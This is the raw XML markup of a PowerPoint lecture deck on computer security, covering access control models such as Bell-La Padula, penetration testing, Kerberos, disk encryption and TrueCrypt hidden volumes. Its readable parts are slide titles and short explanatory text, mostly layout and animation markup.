            <a:ext cx="956736"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11" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="5105400"/>
            <a:ext cx="2000250" cy="64851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Password (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" smtClean="0"/>
              <a:t>PA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>) standard volume</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5867401" y="5229224"/>
            <a:ext cx="956736" cy="714375"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="A2A2A2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3867150" y="5105400"/>
            <a:ext cx="2000250" cy="648512"/>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Password (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" smtClean="0"/>
              <a:t>PB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>) hidden volume</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rettangolo 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467600" y="5867400"/>
            <a:ext cx="1468094" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" i="1" smtClean="0"/>
              <a:t>PA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" smtClean="0"/>
              <a:t> ≠ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" i="1" smtClean="0"/>
              <a:t>PB</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Slide Number Placeholder 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18747957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13315"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(in)">
                                      <p:cBhvr additive="repl">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childTnLst>
                                    <p:set>
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13316"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13316"/>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additive="repl">
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13318"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>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additive="repl">
                                        <p:cTn id="20" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13317"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13317"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13317"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetID="9" presetClass="entr" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>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additive="repl">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100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr additive="repl">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100000">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>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additive="repl">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100000">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="43" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="44" presetID="9" presetClass="entr" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr additive="repl">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additive="repl">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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav>
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="53" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="54" presetID="9" presetClass="entr" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="55" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr additive="repl">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animBg="1"/>
      <p:bldP spid="7" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="10"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Create a Hidden volume on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> flash drive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Segnaposto testo 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" smtClean="0"/>
              <a:t>DEMO 2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="320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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421142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Bell-La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Padula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="3962400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Bell-La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Padula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> (BLP) model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is a classic mandatory access-control model for protecting confidentiality. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The BLP model is derived from the military </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>multilevel security paradigm, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>which has been traditionally used in military organizations for document classification and personnel clearance. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF99276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D9969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818</TotalTime>
  <Words>5711</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>752</Paragraphs>
  <Slides>88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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>DejaVuSans</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Worksheet</vt:lpstr>
      <vt:lpstr>Policy, Models, and Trust</vt:lpstr>
      <vt:lpstr>Security Policy</vt:lpstr>
      <vt:lpstr>Security Models</vt:lpstr>
      <vt:lpstr>Discretionary Access Control</vt:lpstr>
      <vt:lpstr>Mandatory Access Control</vt:lpstr>
      <vt:lpstr>Trust Management</vt:lpstr>
      <vt:lpstr>Trust Management Systems</vt:lpstr>
      <vt:lpstr>Access Control Models</vt:lpstr>
      <vt:lpstr>The Bell-La Padula Model</vt:lpstr>
      <vt:lpstr>The Bell-La Padula Model</vt:lpstr>
      <vt:lpstr>Total Orders and Partial Orders</vt:lpstr>
      <vt:lpstr>How the BLP Model Works</vt:lpstr>
      <vt:lpstr>Defining Security Levels Using Categories</vt:lpstr>
      <vt:lpstr>The Biba Model</vt:lpstr>
      <vt:lpstr>The Biba Model Rules</vt:lpstr>
      <vt:lpstr>The Low-Watermark Model</vt:lpstr>
      <vt:lpstr>The Clark-Wilson Model</vt:lpstr>
      <vt:lpstr>The Chinese Wall Model</vt:lpstr>
      <vt:lpstr>Role-Based Access Control</vt:lpstr>
      <vt:lpstr>RBAC Components</vt:lpstr>
      <vt:lpstr>Hierarchical RBAC</vt:lpstr>
      <vt:lpstr>Visualizing Role Hierarchy</vt:lpstr>
      <vt:lpstr>Penetration Testing</vt:lpstr>
      <vt:lpstr>What Is a Penetration Testing?</vt:lpstr>
      <vt:lpstr>Penetration Testing Is Not…</vt:lpstr>
      <vt:lpstr>Authorization Letter</vt:lpstr>
      <vt:lpstr>To Tell or Not to Tell?</vt:lpstr>
      <vt:lpstr>Black Box      vs.     White Box</vt:lpstr>
      <vt:lpstr>OSSTMM </vt:lpstr>
      <vt:lpstr>Technique – Penetration Testing</vt:lpstr>
      <vt:lpstr>Gathering Information</vt:lpstr>
      <vt:lpstr>Scan IP Addresses</vt:lpstr>
      <vt:lpstr>Fingerprinting</vt:lpstr>
      <vt:lpstr>Identify Vulnerable Services</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploit vulnerability</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Alternatives</vt:lpstr>
      <vt:lpstr>Penetration Test Tutorial</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Identify active hosts and services  in the network</vt:lpstr>
      <vt:lpstr>Identify target OS version</vt:lpstr>
      <vt:lpstr>Vulnerability scanning</vt:lpstr>
      <vt:lpstr>Introduction to Nessus</vt:lpstr>
      <vt:lpstr>Nessus Features</vt:lpstr>
      <vt:lpstr>OpenVAS</vt:lpstr>
      <vt:lpstr>Open VAS technology</vt:lpstr>
      <vt:lpstr>Exploit vulnerabilities</vt:lpstr>
      <vt:lpstr>Select the exploit and the payload</vt:lpstr>
      <vt:lpstr>Set options for exploit and payload</vt:lpstr>
      <vt:lpstr>Vulnerabilities disclosure</vt:lpstr>
      <vt:lpstr>Kerberos</vt:lpstr>
      <vt:lpstr>Kerberos</vt:lpstr>
      <vt:lpstr>Kerberos Tickets</vt:lpstr>
      <vt:lpstr>Kerberos Servers</vt:lpstr>
      <vt:lpstr>Kerberos Authentication</vt:lpstr>
      <vt:lpstr>Authentication Details</vt:lpstr>
      <vt:lpstr>Authentication Details</vt:lpstr>
      <vt:lpstr>Authentication Details</vt:lpstr>
      <vt:lpstr>Kerberos Advantages</vt:lpstr>
      <vt:lpstr>Kerberos Disadvantages</vt:lpstr>
      <vt:lpstr>Secure Storage</vt:lpstr>
      <vt:lpstr>Lost Laptops</vt:lpstr>
      <vt:lpstr>Other Data Protection Scenarios</vt:lpstr>
      <vt:lpstr>Password-Based File Encryption</vt:lpstr>
      <vt:lpstr>Encryption of File Systems</vt:lpstr>
      <vt:lpstr>Sharing Encrypted Files</vt:lpstr>
      <vt:lpstr>Encrypting File System (EFS)</vt:lpstr>
      <vt:lpstr>EFS Keys</vt:lpstr>
      <vt:lpstr>Working with EFS</vt:lpstr>
      <vt:lpstr>BitLocker</vt:lpstr>
      <vt:lpstr>BitLocker Architecture</vt:lpstr>
      <vt:lpstr>Startup and Operation</vt:lpstr>
      <vt:lpstr>Encrypting Disk Sectors</vt:lpstr>
      <vt:lpstr>Trusted Platform Module (TPM)</vt:lpstr>
      <vt:lpstr>Booting with a TPM</vt:lpstr>
      <vt:lpstr>Attacks on BitLocker</vt:lpstr>
      <vt:lpstr>Lost USB Drives</vt:lpstr>
      <vt:lpstr>Encrypting USB Flash Drives</vt:lpstr>
      <vt:lpstr>TrueCrypt</vt:lpstr>
      <vt:lpstr>Create an encrypted volume on a usb flash drive</vt:lpstr>
      <vt:lpstr>Laptop Seizure and Deniability</vt:lpstr>
      <vt:lpstr>Plausible Deniability</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Create a Hidden volume on a usb flash drive</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Confidentiality</dc:title>
  <dc:creator>Roberto Tamassia</dc:creator>
  <cp:lastModifiedBy>Computer Science</cp:lastModifiedBy>
  <cp:revision>156</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-03-21T23:36:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-06T04:42:31Z</dcterms:modified>
</cp:coreProperties>
</file>